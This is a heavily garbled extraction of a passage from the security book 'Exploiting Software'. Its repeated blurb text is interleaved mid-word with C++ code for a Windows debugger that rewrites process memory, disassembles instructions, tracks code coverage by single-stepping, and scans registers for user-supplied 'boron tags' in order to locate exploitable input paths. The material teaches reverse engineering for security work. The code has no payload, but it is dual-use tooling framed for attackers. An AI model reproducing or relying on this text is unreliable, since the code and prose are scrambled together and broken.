k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem std::list::iterator ff = gMemList.begin(); When net w or k secur it y m ech anisms do n ot w or k while(ff != gMemList.end()) At t ack pat t er ns { Rev er se engineer in g struct mb *u = *ff; Classic at t acks ag ainst serv er soft w ar e if(u) Sur pr ising at t acks ag ainst clien t soft war e { Tech niqu es f or cr aft ing m aliciou s inpu t DWORD lpBytes; The t echn ical det ails of b uf fer ov er f low s Root k it s

TRACE("Writing memory based at %d, size %d\n",

u->mbi.BaseAddress, Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. u->mbi.RegionSize);

if(!WriteProcessMemory(hProcess, u->mbi.BaseAddress,

u->p, u->mbi.RegionSize, &lpBytes)) { •

Table of Content s



I ndex

TRACE("WriteProcessMemory failed, error %d\n",

Expl oit ing Softw a re How to Br e ak Code

GetLastError());

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley

if(lpBytes Pub Dat e: February 17, 200 4

!= u->mbi.RegionSize)

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

{ TRACE("Warning, write failed %d != %d\n", lpBytes,

How d oes sof t w are br eak ? How u->mbi.RegionSize); do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can}be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in } g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ff++; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he } scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k The cod At teack t o pat w r itteerback ns t h e m em or y is m uch sim pler . I t d oes not n eed t o quer y t he m em ory regi it sim ply w r it es t he m emor y r egions back t o t h eir origin al locat ion s. Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e

Disassembling Machine Code

Sur pr ising at t acks ag ainst clien t soft war e A d eb ugg er need s t o b e able t o disassem ble inst r uct ions. A b r eak point or single- st ep ev en t w ill l niqu f ort arg cr aft m aliciou each Tech t h read ofes t he et ing pr ocess p oinst inpu ing tto som e inst r uct ion. By using t he t h read CONTEXT fu nct ions y ou can d et er m ine t he addr ess in m em ory w h er e t h e inst r uct ion liv es, b ut t his does n o icalinst det ailsion of itb self. uf fer ov er f low s r ev ealThe t h et echn act ual r uct k itysneed s t o b e " disassem bled" t o det er m in e t he in st r u ct ion . For t u nat ely you d on't nee The mRoot em or w r it e a d isassem bler f rom scr at ch. Micr osoft su pplies a d isassem bler w it h t he OS. This d isassem Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak is used, f or exam p le, b y t he D r. Wat son u t ilit y w hen a crash occu rs. W e can b orr ow f r om t his soft w ar e. exist ing t ool t o pr ov ide disassem bly f unct ions in ou r debug ger:

HANDLE hThread = fOpenThread( THREAD_ALL_ACCESS, FALSE, •

Table of Content s



I ndex theThread->m_thread_id

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar ); y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

if(hThread == NULL)

I SBN: 0- 20 1- 786 95 -8

{

Pages: 51 2

_error_out("[!] Failed to Open the thread handle !\n"); return FALSE; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? } What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om DEBUGPACKET dp; at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . dp.context = theThread->m_ctx; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t dp.hProcess = theThread->m_hProcess; dp.hThread = hThread; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k DWORDAtulOffset t ack pat t er = nsdp.context.Eip; Rev er se engineer in g // Disassemble Classic at t acks the ag instruction. ainst serv er soft w ar e pr ising( at t acks ag ainst if ( Sur disasm &dp , clien t soft war e Tech niqu es &ulOffset f or cr aft ing m aliciou , s inpu t The t echn ical det ails of b uf fer ov er f low s (PUCHAR)m_instruction, Root k it s

FALSE

) )

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak { w ar e. soft ret = TRUE; } else {

_error_out("error disassembling instruction\n"); ret = FALSE; }



Table of Content s



I ndex

CloseHandle(hThread);

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesleyst ru ct ur e is used in t his cod e. Th e cont ext is obt ain ed so w e k now w hich A u ser - defin ed t h read inst Pub r uctDat ione: is bein g17, ex200 ecu4t ed . The disasm f un ct ion call is pu blish ed in t he D r. Wat son sour ce cod February and can easily be in cor I SBN: 0- 20 1- 786 95 -8por at ed int o y our pr oject . We encour age you t o locat e t he sour ce code t o Wat son t o ad Pages: 51d 2 t he r elev ant disassemb ly fu nct ionalit y. Alt er nat iv ely , t here ar e ot her open- sour ce disassem blers available t h at p rov ide sim ilar fun ct ion alit y.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Building a Basic Code Coverage Tool As w e m ent ioned ear ly in t he chap t er, all t he av ailable cover age t ools, com m er cial or ot her w ise, lack signif icant feat u res an d d at a v isualizat ion m et hod s t hat ar e imp ort ant t o t h e at t ack er . I nst ead of figh t ing w it h ex pensive an d deficient t ools, w hy n ot w r it e y our ow n ? I n •t his sect ion w Table of Content e p resent on se of t he jew els of t h is book —a sim ple code cov er age t ool t hat can •be d esign ed Iusing ndex t h e debug ging API calls t hat ar e descr ibed elsewh er e in t his b ook. The t ool Expl oit ing Softwall a recondit How to Br e akbrCode should t r ack ional anches in t he code. I f t he con dit ional b ran ch can be cont r olled byGrueg serHoglund - supp lied t h is sh ould be not ed. Of cour se, t he goal is t o d et er m ine w het her t h e By , Gar yinpu McGrt ,aw inpu t set h as exer cised all possib le br anches t hat can b e cont r olled . Pub lish er: Addison Wesley

For t he pur poses of t his ex amp le, t he t ool will r u n t h e pr ocessor in sin gle- st ep m ode and w ill Pub Dat e: February 17, 200 4 t r ack each inst r uct ion usin g a disassem bler. The cor e obj ect we are t rack ing is a code I SBN: 0- 20 1-ion 786 95 locat ion . A locat is -8 a sing le con t inuou s block of inst r uct ions w it h no br anches. Bran ch Pages: 2 inst r uct ions51 conn ect all t he code locat ions t oget her . That is, one code locat ion br anches t o anot h er cod e locat ion . We w ant t o t r ack all t he code locat ions t hat h ave been v isit ed and det er min e w het her user- su pplied inp ut is being pr ocessed in t he code locat ion. The st r uct ur e w e ar e using t o t rack code locat ions is as follow s: How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . // location ThisAmcode ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t struct item {

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k item() At t ack pat t er ns { Rev er se engineer in g subroutine=FALSE;

Classic at t acks ag ainst serv er soft w ar e is_conditional=FALSE; Sur pr ising at t acks ag ainst clien t soft war e isret=FALSE; Tech niqu es f or cr aft ing m aliciou s inpu t boron=FALSE; The t echn ical det ails of b uf fer ov er f low s address=0; Root k it s length=1; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. x=0; y=0; column=0; m_hasdrawn=FALSE; }

bool

subroutine;

bool

is_conditional;

bool

isret;

• •

Table of Content s I ndex boron;

bool

Expl oit ing Softw a re How to Br e ak Code

bool m_hasdrawn; By Gr eg Hoglund , Gar y McGr aw

// To stop circular references

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

int

address;

I SBN: 0- 20 1- 786 95 -8

Pages: int

51 2

int

length; column;

int x; How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew int alls, int ru siony; det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by m_disasm; bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om std::string at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . std::string m_borons; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t std::list mChildren; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k struct item * lookup(DWORD addr) At t ack pat t er ns {Rev er se engineer in g std::list::iterator serv er soft w ar ei = mChildren.begin(); Sur prwhile(i ising at t acks ag ainst clien t soft war e != mChildren.end()) Tech{niqu es f or cr aft ing m aliciou s inpu t The t echnstruct ical det ails of b*g uf fer ov er f low s item = *i; Root k it s

if(g->address == addr) return g;

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak i++; soft w ar e. } return NULL; } };

Each locat ion has a list of poin t er s t o all br an ch t ar get s f rom t he locat ion. I t also has a st rin g t hat r ep r esent s t h e assem bly inst r uct ions t hat m ak e up t h e locat ion . The f ollowin g code execut es on each single- st ep ev en t : •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

structI SBN: item *anItem = NULL; 0- 20 1- 786 95 -8 Pages: 51 2

// Make sure we have a fresh context. theThread->GetThreadContext(); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. // Disassemble the target instruction. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br m_disasm.Disasm( theThread );eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // Determine if this is the target of a branch instruction. if(m_next_is_target || wm_next_is_calltarget) Why sof t w ar e ex ploit ill con t inue t o be a ser ious p r oblem {

When net w or k secur it y m ech anisms do n ot w or k anItem = tOnBranchTarget( theThread ); At t ack pat er ns Rev er se engineer in g SetCurrentItemForThread( theThread->m_thread_id, anItem); Classic at t acks ag ainst serv er soft w ar e m_next_is_target = FALSE; Sur pr ising at t acks ag ainst= clien t soft war e m_next_is_calltarget FALSE; Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s // We have branched, so we need to set the parent/child

Root k it s // lists. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft wif(old_item) ar e. { // Determine if we are already in the child. if(NULL == old_item->lookup(anItem->address)) {

old_item->mChildren.push_back(anItem); } } } •

Table of Content s

else •

I ndex

Expl oit ing Softw a re How to Br e ak Code

{

By Gr eg Hoglund , Gar y McGr aw

anItem = GetCurrentItemForThread( theThread->m_thread_id ); Pub lish er: Addison Wesley

}

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

if(anItem) { How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are anItem->m_disasm += m_disasm.m_instruction; fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. anItem->m_disasm += '\n'; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d } t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . char *_c = m_disasm.m_instruction; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he if(strstr(_c, scr ipt k id die t r eat"call")) m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem m_next_is_calltarget = TRUE; When net w or k secur it y m ech anisms do n ot w or k } At t ack pat t er ns else if(strstr(_c, "ret")) Rev er se engineer in g {

Classic at t acks ag ainst serv er soft w ar e m_next_is_target = TRUE; Sur pr ising at t acks ag ainst clien t soft war e if(anItem) anItem->isret = sTRUE; Tech niqu es f or cr aft ing m aliciou inpu t

}

The t echn ical det ails of b uf fer ov er f low s

else Root if(strstr(_c, "jmp")) k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak { soft w ar e. m_next_is_target = TRUE; } else if(strstr(_c, "je")) {

m_next_is_target = TRUE; if(anItem)anItem->is_conditional=TRUE; } else if(strstr(_c, "jne")) •

Table of Content s



I ndex

{

Expl oit ing Softw a re How to Br e ak Code

m_next_is_target = TRUE;

By Gr eg Hoglund , Gar y McGr aw

if(anItem)anItem->is_conditional=TRUE; Pub lish er: Addison Wesley

}

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

else if(strstr(_c, "jl")) Pages: 51 2

{ m_next_is_target = TRUE; How if(anItem)anItem->is_conditional=TRUE; d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. } Ex p lo iif(strstr(_c, t in g S o ft w a re is"jle")) loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d else t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . { This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he m_next_is_target = TRUE; scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t if(anItem)anItem->is_conditional=TRUE; Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem } When net w or k secur it y m ech anisms do n ot w or k else if(strstr(_c, "jz")) At t ack pat t er ns { Rev er se engineer in g m_next_is_target = TRUE; Classic at t acks ag ainst serv er soft w ar e if(anItem)anItem->is_conditional=TRUE; Sur pr ising at t acks ag ainst clien t soft war e }

Tech niqu es f or cr aft ing m aliciou s inpu t

else if(strstr(_c, "jnz")) The t echn ical det ails of b uf fer ov er f low s {

Root k it s

m_next_is_target = TRUE; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if(anItem)anItem->is_conditional=TRUE; } else if(strstr(_c, "jg")) {

m_next_is_target = TRUE; if(anItem)anItem->is_conditional=TRUE; } else if(strstr(_c, "jge")) •

Table of Content s



I ndex

{

Expl oit ing Softw a re How to Br e ak Code

m_next_is_target = TRUE;

By Gr eg Hoglund , Gar y McGr aw

if(anItem)anItem->is_conditional=TRUE; Pub lish er: Addison Wesley

}

Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8

else

Pages: 51 2

{ // Not a branching instruction, How // d oes t w are Howcurrent do at t acker s mlength. ake sof t w ar e br eak on p ur pose? Why are sosof add onebr eak to ?the item fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Whatif(anItem) t ools can be anItem->length++; u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex } p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he ////////////////////////////////////////////// scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // Check for boron tag. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ////////////////////////////////////////////// When net w or k secur it y m ech anisms do n ot w or k if(anItem && mTagLen) At t ack pat t er ns { Rev er se engineer in g if(check_boron(theThread, _c, anItem)) anItem->boron = TRUE; Classic at t acks ag ainst serv er soft w ar e } Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t old_item = anItem; The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Firstw, ar w e. e see t he cod e get s a fr esh cont ex t st r uct ur e f or t he t hr ead t h at j ust sing le st epp ed . soft The in st r u ct ion poin t ed t o by t h e inst r uct ion p oint er is disassem bled. I f t he in st r u ct ion is t h e beginn ing of a n ew cod e locat ion , t he list of cur r ent ly m app ed locat ions is qu er ied so t hat w e don 't m ake d ouble ent r ies. The inst r uct ion is t hen com p ared w it h a list of k now n br anching inst r uct ions, and ap pr opr iat e flags are set in t h e it em st ru ct u r e. Finally , a ch eck is m ade f or boron t ags. The code for a boron t ag check is pr esen t ed in t he f ollowin g p arag r aph.

Checking for

Boron

Tags

When a b reak point or single- st ep ev en t h as occu rr ed, t h e debu gger m ay w ish t o qu er y m em or y f or boron t ags ( t h at is, subst r ing s t hat ar e kn ow n t o be u ser sup plied ) . Usin g t he m em or y q uery r ou t in es int r oduced ear lier in t h e book , w e can mak e som e fair ly int elligent qu er ies for boron t ags. Becau se CPU r eg ist er s ar e used const an t ly t o st or e poin t er s t o dat a, it m akes sense t o ch eck all t h e CPU r egist er s f or v alid m em ory p oint ers w hen t h e br eakp oint or single st ep has occu r red. I f t h e r eg ist er p oin t s t o valid m em or y , w e can t hen q uery t hat m em or y an d look f or a boron t ag. Th e fact is t hat any code locat ion t hat is using user • Table of Content s supp lied dat a t y pically h as a p oin t er t o t hese d at a in one of t he r eg ist er s. To check t he • I ndex r eg ist er s, y ou can use a rou t ine like t his: Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

bool check_boron( CDThread *theThread, char *c, struct item *ip ) { How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew // alls,If intany ru sion ect registers ion sy st em s,point and ant us soft warbuffer, e n ot k eep in g this. out t he bad g uy s? ofdet the toiv irthe user tag What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. DWORD reg; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . if(strstr(c, "eax")) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt{ k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t =artheThread->m_ctx.Eax; Why reg sof t w e ex ploit w ill con t inue t o be a ser ious p r oblem if(can_read( (void When net w or k securtheThread, it y m ech anisms do n*)reg ot w or k)) { pat t er ns At t ack Rev er se engineer SIZE_T in lpRead; g Classic atchar t acks string[255]; ag ainst serv er soft w ar e Sur pr isingstring[mTagLen]=NULL; at t acks ag ainst clien t soft war e Tech niqu es cr aftthe ing m aliciou smemory. inpu t // f or Read target The t echn ical det ails of b uf fer ov er f low s if(ReadProcessMemory( theThread->m_hProcess, Root k it s

(void *)reg, string, mTagLen, &lpRead))

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak { soft w ar e. if(strstr( string, mBoronTag )) { // Found the boron string. ip->m_borons += "EAX: ";

ip->m_borons += c; ip->m_borons += " —> "; ip->m_borons += string; ip->m_borons += '\n'; •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

return TRUE; By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February } 17, 200 4 I SBN: 0- 20 1- 786 95 -8

} 51 2 Pages: } .... How d oes sof t w arecall br eakfor ? How at t acker s m ake EAX, sof t w ar e br eak p ur pose? // Repeat this alldothe registers EBX, ECX,onEDX, ESI,Why and are EDI. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d return FALSE; t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . } This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t To sav e r oom 't past e tcon h e tcod e for all ar eg er s,pju st t he EAX r egist er . Th e code Why sof t,wware edidn ex ploit w ill inue t o be serist ious r oblem should qu er y all r egist ers list ed in t h e com m ent . Th e fu nct ion ret ur ns TRUE if t h e supp lied boronWhen t ag isnet f oun w ord kb secur eh inditone y m ech of t anisms h e memdo or yn ot point w or erks. At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Conclusion All soft w ar e is m ade up of machin e- r eadable cod e. I n f act , cod e is w hat mak es ever y pr ogr am f un ct ion t he w ay it does. The cod e defines t h e soft w ar e and t h e decisions it w ill m ake. Rev er se eng ineer ing, as app lied t o sof t w are, is t h e pr ocess of look ing for p at t ern s in •t his cod e. ByTable Content s t ain cod e pat t er ns, an at t ack er can locat e pot ent ial sof t w ar e id enoft ify ing cer •v ulner abilit ies. I ndex Expl oit ing Softw a re How to Br e ak Code

This chap t er has posed By Gr eg Hoglund , Gar yex McGr aw y ou t o t h e basic concep t s and m et hods of decom pilat ion, all in t he nam e of b et t er u nder st anding h ow a p rog r am r eally w or ks. W e' ve ev en g one so f ar as t o pr ov ide som e r udim en t ar y ( y et st ill pow erf ul) t ools as exam ples. Using t h ese m et hods and Pub lish er: Addison Wesley t ools, y ou can lear n alm ost any t hin g y ou need t o k now ab out a t ar get , an d t hen u se t his Pub Dat e: February 17, 200 4 inf orm at ion t o ex ploit it . I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Chapter 4. Exploiting Server Software Hacking a com p ut er by sit t ing d own in fr ont of it w it h a boot d isk b or ders on t h e t r ivial. How ev er , a bTable oot dofisk at t ack r equ ir es sit t ing in f r ont of a console t hat m ay hav e ph ysical • Content s cont r ols ( includin g, say , ar med gu ard s and dog s) . The only ser iou s skill r equir ed t o car ry out • I ndex t his sor t of at t ack is br eak ing and ent er ing. For t his r eason, phy sical secur it y of t he ar m ed Expl oit ing Softw a re How to Br e ak Code gu ard sor t is n ecessar y t o secur e t he most secur it y - cr it ical com put er s in t he w or ld ( t hink By Grional eg Hoglund , Gar McGr aw ) . Of cour se, t ak en t o t he ex t r em e, t he most secur e com put er is n ot Nat Secur it yy Agency connect ed t o a n et wor k , r emain s " off " at all t im es, has it s d isk w iped, and is bur ied u nder lish er: Wesley fou rPub t ons of Addison con cr et e. The p rob lem wit h ex t rem e ph ysical secur it y is t hat t he m ost secu re comPub putDat er e:also ap pears t o4 be com plet ely useless! I n t he r eal w or ld p eop le lik e t o do t hings February 17, 200 w it h t heir comp ut er s. So t hey p lu g t hem in, b oot t h em up, w ir e t h em t o t h e Net , and st ar t I SBN: 0- 20 1- 786 95 -8 t app ing aw ay at t h e k ey boar d. Pages: 51 2 On t he I n t ern et , ver y lit t le is don e t o secu r e most m ach in es. I n secur e m ach ines, plugg ed in r ight out of t he b ox ar e " nak ed . " The I n t ern et is, for t he m ost par t , a collect ion of nak ed m achines st ru ng t oget her lik e so m any t in cans w it h st r in g bet w een t hem . The p r oblem is so bad t h at a scr ipt kidd ie w anna- b e can lit er ally d ow nload an ex ploit t ool t hat is m ore t han t w o oes frsof br eak ? How acker s m ake lly sofat t wtar e br p ur are yHow ear sdold omt waare pu blic Web sit edo anat d tst ill successfu ack a eak sur pron isin glypose? lar geWhy nu mb er of fir achines. ew alls, int ru sion detalw ectay ion sy steem and ir us war e on n ott he k eep in.gI nout t he g uy m There are s lam t ars,get s t oant privact icesoft ag ainst Net m or e rbad ealist ic s? What t ios, ools acan sedw tor o kb reak soft warew e?hTh book p rove, ides t he t h answ s. sof t w ar e pat ches, scenar t argbe et unet w ill be som at is m or e secur using e later est r unn ing an in t r usion d et ect ion sy st em t o u ncover k now n at t ack s, and hav ing a f ir ew all or t w o Ex i t inegr S o ftaud w aitreing is loaded it ht o exboot amp.les of r eal at t ack s, at t ack pat t er ns, t ools, an d w itphlosom eal eq uipm w ent t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack y ousof mu lear h ow r eal t acks are nreally ou t . Of cour, se, t wstarfir e st can b en ex ploit ed at any w here, ot j ustcarr on ied m achines connect ed t o t he I nt er net . " Old - fashioned" net w or ks st ill ex ist in t he f orm of t 